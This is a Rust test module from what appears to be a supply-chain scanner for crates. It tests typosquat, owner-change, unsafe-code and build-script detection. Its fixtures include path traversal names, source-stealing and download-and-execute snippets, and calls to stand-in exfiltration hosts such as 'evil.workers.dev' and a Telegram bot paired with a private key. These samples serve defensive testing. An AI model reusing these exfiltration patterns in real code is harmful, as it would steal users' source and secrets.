2021        assert!(sig.is_empty(), "unchanged owners must not be flagged");
2022    }
2023
2024    #[test]
2025    fn owners_without_baseline_emits_nothing() {
2026        // No baseline means no reference point — we cannot (and must not) claim a
2027        // change. Trust is established first, detected second.
2028        let lk = lock(vec![pkg("serde", "1.0.0", false)]);
2029        let opts = opts_with_owners(&[("serde@1.0.0", &["newowner"])], &[]);
2030        let mut sig = vec![];
2031        collect_owners_changed(&lk, &opts, &mut sig);
2032        assert!(sig.is_empty(), "no baseline -> no signal");
2033    }
2034
2035    #[test]
2036    fn owners_changed_survives_known_good_baseline() {
2037        // The xz / event-stream takeovers hit ubiquitous, "known-good" crates, so
2038        // an ownership change there must NOT be downgraded by the baseline.
2039        assert!(is_known_good("libc"), "test premise: libc is known-good");
2040        let lk = lock(vec![pkg("libc", "0.2.0", false)]);
2041        let opts = opts_with_owners(
2042            &[("libc@0.2.0", &["alice", "mallory"])],
2043            &[("libc", &["alice"])],
2044        );
2045        let signals = collect_basic_signals(&lk, &opts).unwrap();
2046        let f = signals
2047            .iter()
2048            .find(|s| s.id == "owners_changed")
2049            .expect("owners_changed present");
2050        assert_eq!(
2051            f.severity,
2052            Severity::Medium,
2053            "ownership change must survive the known-good baseline"
2054        );
2055        assert!(f.weight > 0, "must still count toward risk");
2056    }
2057
2058    #[test]
2059    fn owners_changed_detected_on_later_version_without_first_metadata() {
2060        // Lower version has no owner metadata; the higher one has a changed owner
2061        // set. The change must still be detected (no dedup short-circuit).
2062        let lk = lock(vec![
2063            pkg("foo-crate", "1.0.0", false),
2064            pkg("foo-crate", "2.0.0", false),
2065        ]);
2066        let opts = opts_with_owners(
2067            &[("foo-crate@2.0.0", &["alice", "newowner"])],
2068            &[("foo-crate", &["alice"])],
2069        );
2070        let mut sig = vec![];
2071        collect_owners_changed(&lk, &opts, &mut sig);
2072        assert_eq!(
2073            sig.iter().filter(|s| s.id == "owners_changed").count(),
2074            1,
2075            "ownership change on a non-first version must be detected"
2076        );
2077    }
2078
2079    #[test]
2080    fn locate_crate_dir_rejects_path_traversal() {
2081        // A hostile lockfile cannot make us resolve a directory outside the root.
2082        let root = std::env::temp_dir();
2083        for evil in ["../../etc", "..", "foo/bar", "a/../../b"] {
2084            let p = pkg(evil, "1.0.0", false);
2085            assert!(
2086                locate_crate_dir(&root, &p).is_none(),
2087                "traversal name {evil:?} must be refused"
2088            );
2089        }
2090        // A hostile version string is likewise refused.
2091        let p = pkg("serde", "../../etc", false);
2092        assert!(locate_crate_dir(&root, &p).is_none());
2093    }
2094
2095    #[test]
2096    fn detects_native_ffi_by_name() {
2097        let model = lock(vec![pkg("openssl-sys", "0.9.99", false)]);
2098        let mut signals = vec![];
2099        collect_name_heuristics(&model, &mut signals);
2100        assert!(signals.iter().any(|s| s.id == "native_ffi_detected"));
2101        let s = signals
2102            .iter()
2103            .find(|s| s.id == "native_ffi_detected")
2104            .unwrap();
2105        // Name-only FFI is a weak signal: Low severity, modest confidence.
2106        assert_eq!(s.severity, Severity::Low);
2107        assert!(s.confidence >= 0.5);
2108    }
2109
2110    #[test]
2111    fn known_good_crate_downgraded_to_baseline() {
2112        let model = lock(vec![pkg("windows-sys", "0.61.2", false)]);
2113        let signals = collect_basic_signals(&model, &AnalysisOptions::default()).unwrap();
2114        let ffi = signals
2115            .iter()
2116            .find(|s| s.id == "native_ffi_detected")
2117            .expect("signal kept for transparency");
2118        assert_eq!(ffi.severity, Severity::Info);
2119        assert_eq!(ffi.weight, 0);
2120        assert!(ffi.evidence.iter().any(|e| e.kind == "baseline"));
2121        assert!(is_known_good("windows-sys"));
2122        assert!(!is_known_good("openssl-sys"));
2123    }
2124
2125    #[test]
2126    fn local_crate_not_flagged_for_ffi() {
2127        let model = lock(vec![pkg("my-app-sys", "0.1.0", true)]);
2128        let mut signals = vec![];
2129        collect_name_heuristics(&model, &mut signals);
2130        assert!(signals.is_empty());
2131    }
2132
2133    #[test]
2134    fn damerau_levenshtein_basics() {
2135        assert_eq!(damerau_levenshtein("serde", "serde"), 0);
2136        assert_eq!(damerau_levenshtein("serde", "serdf"), 1); // substitution
2137        assert_eq!(damerau_levenshtein("tokio", "tokoi"), 1); // transposition
2138        assert_eq!(damerau_levenshtein("reqwest", "reqwes"), 1); // deletion
2139        assert_eq!(damerau_levenshtein("serde", "serde_json"), 5);
2140    }
2141
2142    #[test]
2143    fn detects_typosquat_one_edit_away() {
2144        let model = lock(vec![pkg("reqwset", "1.0.0", false)]); // transposition of reqwest
2145        let mut signals = vec![];
2146        collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
2147        let s = signals
2148            .iter()
2149            .find(|s| s.id == "possible_typosquat")
2150            .unwrap();
2151        assert!(s.evidence[0].summary.contains("reqwest"));
2152    }
2153
2154    #[test]
2155    fn does_not_flag_legitimate_crates() {
2156        // Real crates that merely resemble popular ones are far in edit distance.
2157        let model = lock(vec![
2158            pkg("serde_json", "1.0.0", false),
2159            pkg("tokio-util", "0.7.0", false),
2160            pkg("my-app-utils", "0.1.0", false),
2161            pkg("serde", "1.0.0", false), // exact popular -> not flagged
2162        ]);
2163        let mut signals = vec![];
2164        collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
2165        assert!(signals.is_empty(), "false positives: {signals:?}");
2166    }
2167
2168    #[test]
2169    fn legit_lookalikes_are_not_typosquats() {
2170        // Real, widely-used crates that sit one edit away from a popular crate
2171        // (`mime`↔`time`, `md-5`↔`md5`, `anes`↔`aes`). Regression for a corpus
2172        // scan that mis-flagged all three as typosquats.
2173        let model = lock(vec![
2174            pkg("mime", "0.3.17", false),
2175            pkg("md-5", "0.10.6", false),
2176            pkg("anes", "0.1.6", false),
2177        ]);
2178        let mut signals = vec![];
2179        collect_typosquat(&model, &AnalysisOptions::default(), &mut signals);
2180        assert!(signals.is_empty(), "false positives: {signals:?}");
2181    }
2182
2183    /// Build a throwaway crate dir under the temp dir with the given
2184    /// `relative-path -> contents` files inside a `src/` tree. Returned guard
2185    /// removes the dir on drop. No external crates (no `tempfile`).
2186    fn scratch_crate(tag: &str, files: &[(&str, &str)]) -> PathBuf {
2187        let root = std::env::temp_dir().join(format!(
2188            "rustinel_exfil_{}_{}_{}",
2189            tag,
2190            std::process::id(),
2191            files.len()
2192        ));
2193        let _ = std::fs::remove_dir_all(&root);
2194        std::fs::create_dir_all(root.join("src")).unwrap();
2195        for (rel, body) in files {
2196            let p = root.join("src").join(rel);
2197            if let Some(parent) = p.parent() {
2198                std::fs::create_dir_all(parent).unwrap();
2199            }
2200            std::fs::write(&p, body).unwrap();
2201        }
2202        root
2203    }
2204
2205    #[test]
2206    fn source_exfil_signal_builds_high() {
2207        // The signal builder always fires once the caller has confirmed the
2208        // per-file conjunction; it just renders the `what` prose.
2209        let sig = source_exfil_signal("x@1", false, true, "lib.rs".into());
2210        assert_eq!(sig.id, "suspicious_source_exfil");
2211        assert_eq!(sig.severity, Severity::High);
2212        assert!(sig
2213            .evidence
2214            .iter()
2215            .any(|e| e.summary.contains("wallet/private-key")));
2216        let sig = source_exfil_signal("x@1", true, false, "lib.rs".into());
2217        assert!(sig
2218            .evidence
2219            .iter()
2220            .any(|e| e.summary.contains("exfiltrates over the network")));
2221    }
2222
2223    #[test]
2224    fn source_exfil_conjunction_must_hold_in_one_file() {
2225        // scans-source alone -> not the fingerprint (legit codegen helper).
2226        let only_scan = scratch_crate(
2227            "scan",
2228            &[(
2229                "codegen.rs",
2230                "let _ = std::fs::read_dir(\".\"); let x = \".rs\";",
2231            )],
2232        );
2233        assert!(scan_source_exfil(&only_scan)
2234            .and_then(|s| s.source_exfil_sample)
2235            .is_none());
2236        let _ = std::fs::remove_dir_all(&only_scan);
2237
2238        // CROSS-FILE: one file scans `.rs` sources, a *separate* file uses
2239        // reqwest. A benign crate (codegen + HTTP client) must NOT be flagged.
2240        // This is the false-attribution bug the per-file conjunction fixes.
2241        let cross = scratch_crate(
2242            "cross",
2243            &[
2244                (
2245                    "codegen.rs",
2246                    "fn g(){ let _=std::fs::read_dir(\".\"); let _=\".rs\"; }",
2247                ),
2248                (
2249                    "client.rs",
2250                    "fn f(){ let _ = reqwest::blocking::get(\"http://x\"); }",
2251                ),
2252            ],
2253        );
2254        assert!(
2255            scan_source_exfil(&cross)
2256                .and_then(|s| s.source_exfil_sample)
2257                .is_none(),
2258            "cross-file scan + network must NOT fire (benign codegen + HTTP client)"
2259        );
2260        let _ = std::fs::remove_dir_all(&cross);
2261
2262        // SINGLE FILE doing both -> the real faster_log/async_println pattern.
2263        let bad = scratch_crate(
2264            "bad",
2265            &[(
2266                "steal.rs",
2267                "fn s(){ for e in std::fs::read_dir(\".\").unwrap(){ let _=\".rs\"; \
2268                 let _=reqwest::blocking::get(\"http://evil\"); } }",
2269            )],
2270        );
2271        let scan = scan_source_exfil(&bad).expect("scan");
2272        assert!(
2273            scan.source_exfil_sample.is_some(),
2274            "single-file scan+network IS the fingerprint"
2275        );
2276        assert!(scan.source_exfil_network);
2277        let _ = std::fs::remove_dir_all(&bad);
2278    }
2279
2280    #[test]
2281    fn env_gated_requires_causal_proximity() {
2282        // Tight (rustdecimal shape): env gate, download, and spawn within a few
2283        // lines of one block -> flagged.
2284        let tight = "fn run() {\n    if std::env::var(\"GITLAB_CI\").is_ok() {\n        \
2285                     let _ = reqwest::blocking::get(\"http://x/p.bin\");\n        \
2286                     std::process::Command::new(\"/tmp/p.bin\").status();\n    }\n}\n";
2287        assert!(
2288            env_gated_block(tight),
2289            "tight download-and-execute must be flagged"
2290        );
2291
2292        // Scattered (large-CLI false positive): the same three primitives exist but
2293        // hundreds of lines apart, causally unrelated -> NOT flagged.
2294        let mut scattered = String::from("let _cfg = std::env::var(\"APP_RPC\");\n");
2295        scattered.push_str(&"// unrelated code\n".repeat(80));
2296        scattered.push_str("let _ = reqwest::blocking::get(\"https://rpc.example\");\n");
2297        scattered.push_str(&"// unrelated code\n".repeat(80));
2298        scattered.push_str("std::process::Command::new(resolve_cargo_binary()).status();\n");
2299        assert!(
2300            !env_gated_block(&scattered),
2301            "unrelated env/network/spawn scattered across a large file must NOT be flagged"
2302        );
2303    }
2304
2305    #[test]
2306    fn dual_use_service_domain_needs_secret_corroboration() {
2307        // A purpose-built integration crate hitting its own service (Telegram) with
2308        // no secret handling must NOT be flagged just for talking to its API.
2309        let benign = scratch_crate(
2310            "tg_benign",
2311            &[(
2312                "lib.rs",
2313                "pub fn send(){ let _=reqwest::blocking::get(\"https://api.telegram.org/bot1/sendMessage\"); }",
2314            )],
2315        );
2316        assert!(
2317            scan_source_exfil(&benign)
2318                .and_then(|s| s.exfil_domain)
2319                .is_none(),
2320            "a telegram crate must not trip the domain signal without the exfil shape"
2321        );
2322        let _ = std::fs::remove_dir_all(&benign);
2323
2324        // Same service domain + secret material in the file -> the exfil shape.
2325        let exfil = scratch_crate(
2326            "tg_exfil",
2327            &[(
2328                "lib.rs",
2329                "pub fn steal(){ let _k=\"private_key\"; let _=reqwest::blocking::get(\"https://api.telegram.org/bot/x\"); }",
2330            )],
2331        );
2332        assert!(
2333            scan_source_exfil(&exfil)
2334                .and_then(|s| s.exfil_domain)
2335                .is_some(),
2336            "telegram + secret handling IS the exfil shape"
2337        );
2338        let _ = std::fs::remove_dir_all(&exfil);
2339
2340        // A pure exfil host has no legitimate hardcoding -> flagged regardless.
2341        let host = scratch_crate(
2342            "cf_exfil",
2343            &[(
2344                "lib.rs",
2345                "pub fn x(){ let _=reqwest::blocking::get(\"https://evil.workers.dev/c\"); }",
2346            )],
2347        );
2348        assert!(
2349            scan_source_exfil(&host)
2350                .and_then(|s| s.exfil_domain)
2351                .is_some(),
2352            "a pure exfil host is suspicious on its own"
2353        );
2354        let _ = std::fs::remove_dir_all(&host);
2355    }
2356
2357    #[test]
2358    fn evidence_sample_is_walk_order_independent() {
2359        // Two source files both carry the `unsafe` marker. The chosen evidence
2360        // path must be the lexicographically-first matching file (`a_first.rs`),
2361        // never whichever one `read_dir` happens to yield first — otherwise
2362        // --no-timestamp output would differ across filesystems. `sorted_dir_entries`
2363        // makes the walk reproducible, so the sample is deterministic.
2364        let dir = scratch_crate(
2365            "unsafe_det",
2366            &[
2367                ("z_last.rs", "pub unsafe fn z() { unsafe {} }"),
2368                ("a_first.rs", "pub unsafe fn a() { unsafe {} }"),
2369            ],
2370        );
2371        let (stats, sample) = count_unsafe(&dir).expect("unsafe found in the crate");
2372        assert!(stats.total >= 2, "both files' unsafe should be counted");
2373        assert!(
2374            sample.ends_with("a_first.rs"),
2375            "evidence sample must be the lexicographically-first match, was {sample:?}"
2376        );
2377        let _ = std::fs::remove_dir_all(&dir);
2378    }
2379
2380    #[test]
2381    fn sorted_dir_entries_is_lexicographic() {
2382        let dir = scratch_crate(
2383            "sorted_entries",
2384            &[("c.rs", "x"), ("a.rs", "x"), ("b.rs", "x")],
2385        );
2386        let names: Vec<String> = sorted_dir_entries(&dir.join("src"))
2387            .iter()
2388            .map(|e| e.file_name().to_string_lossy().into_owned())
2389            .collect();
2390        assert_eq!(names, vec!["a.rs", "b.rs", "c.rs"]);
2391        let _ = std::fs::remove_dir_all(&dir);
2392    }
2393
2394    #[test]
2395    fn benign_build_script_is_not_suspicious() {
2396        // The legit cc-style fixture: only emits link directives.
2397        let src = "fn main() {\n    println!(\"cargo:rustc-link-lib=ssl\");\n}\n";
2398        assert!(build_script_intent_signal("openssl-sys@0.9.99", src, "build.rs".into()).is_none());
2399    }
2400
2401    #[test]
2402    fn network_build_script_is_high() {
2403        let src = "fn main(){ let _ = reqwest::blocking::get(\"http://evil/x\"); }";
2404        let sig = build_script_intent_signal("evil@1.0.0", src, "build.rs".into()).unwrap();
2405        assert_eq!(sig.id, "build_script_suspicious");
2406        assert_eq!(sig.severity, Severity::High);
2407        assert!(sig
2408            .evidence
2409            .iter()
2410            .any(|e| e.summary.contains("network access")));
2411    }
2412
2413    #[test]
2414    fn payload_build_script_is_medium() {
2415        let src = "fn main(){ let p = include_bytes!(\"blob.bin\"); let _ = p; }";
2416        let sig = build_script_intent_signal("sneaky@1.0.0", src, "build.rs".into()).unwrap();
2417        assert_eq!(sig.severity, Severity::Medium);
2418        assert!(sig.evidence.iter().any(|e| e.summary.contains("payload")));
2419    }
2420
2421    #[test]
2422    fn dlopen_in_a_feature_name_is_not_a_payload() {
2423        // Regression: the `dlopen` marker matched the substring inside a cargo
2424        // feature / env-var name (`source-fontconfig-dlopen`), flagging a 7-line
2425        // build.rs that only forwards a cfg flag. The call form must be required.
2426        let benign = "fn main(){\n  println!(\"cargo:rerun-if-env-changed=RUST_FONTCONFIG_DLOPEN\");\n  \
2427                      if std::env::var(\"RUST_FONTCONFIG_DLOPEN\").is_ok() {\n    \
2428                      println!(\"cargo:rustc-cfg=feature=\\\"source-fontconfig-dlopen\\\"\");\n  }\n}\n";
2429        assert!(
2430            build_script_intent_signal("font-kit@1.0.0", benign, "build.rs".into()).is_none(),
2431            "a `*-dlopen` feature/env name must not be read as dynamic loading"
2432        );
2433        // A real FFI dynamic-load call is still flagged.
2434        let real = "fn main(){ unsafe { let _ = libc::dlopen(p, 1); } }";
2435        assert!(build_script_intent_signal("x@1.0.0", real, "build.rs".into()).is_some());
2436    }
2437
2438    #[test]
2439    fn detects_multiple_versions() {
2440        let model = lock(vec![pkg("foo", "1.0.0", false), pkg("foo", "2.0.0", false)]);
2441        let mut signals = vec![];
2442        collect_multiple_versions(&model, &mut signals);
2443        assert_eq!(
2444            signals
2445                .iter()
2446                .filter(|s| s.id == "multiple_versions_same_crate")
2447                .count(),
2448            2
2449        );
2450    }
2451
2452    #[test]
2453    fn unsafe_scan_counts_only_real_code() {
2454        assert_eq!(scan_unsafe("unsafe { *p }").total, 1);
2455        assert_eq!(scan_unsafe("no danger here").total, 0);
2456        // `unsafely` is not the keyword; `// unsafe` is a comment -> 0.
2457        assert_eq!(scan_unsafe("let unsafely = 1; // unsafe").total, 0);
2458    }
2459
2460    #[test]
2461    fn unsafe_scan_ignores_comments_and_strings() {
2462        let src = r##"
2463            // unsafe in a line comment
2464            /* unsafe in a block /* nested unsafe */ comment */
2465            let s = "this unsafe is a string";
2466            let r = r#"raw unsafe"#;
2467            fn real() { unsafe { } }
2468        "##;
2469        let st = scan_unsafe(src);
2470        assert_eq!(st.total, 1, "only the real unsafe block counts, got {st:?}");
2471        assert_eq!(st.blocks, 1);
2472    }
2473
2474    #[test]
2475    fn unsafe_scan_categorizes() {
2476        let src = "unsafe fn a(){} unsafe impl T for U {} unsafe trait W {} fn b(){ unsafe { } }";
2477        let st = scan_unsafe(src);
2478        assert_eq!(st.total, 4);
2479        assert_eq!(st.fns, 1);
2480        assert_eq!(st.impls, 1);
2481        assert_eq!(st.traits, 1);
2482        assert_eq!(st.blocks, 1);
2483        assert_eq!(st.breakdown(), "4 (1 fn, 1 impl, 1 trait, 1 block)");
2484    }
2485
2486    #[test]
2487    fn unsafe_scan_handles_char_literal_with_quote() {
2488        // The '"' char literal must not flip the scanner into string mode.
2489        let src = "let q = '\"'; unsafe { }";
2490        assert_eq!(scan_unsafe(src).total, 1);
2491    }
2492
2493    #[test]
2494    fn sort_is_severity_descending() {
2495        let mut signals = vec![
2496            RiskSignal {
2497                id: "a".into(),
2498                package: "p".into(),
2499                severity: Severity::Low,
2500                weight: 1,
2501                confidence: 1.0,
2502                evidence: vec![],
2503                recommendation: String::new(),
2504            },
2505            RiskSignal {
2506                id: "b".into(),
2507                package: "p".into(),
2508                severity: Severity::High,
2509                weight: 1,
2510                confidence: 1.0,
2511                evidence: vec![],
2512                recommendation: String::new(),
2513            },
2514        ];
2515        sort_signals(&mut signals);
2516        assert_eq!(signals[0].severity, Severity::High);
2517    }
2518}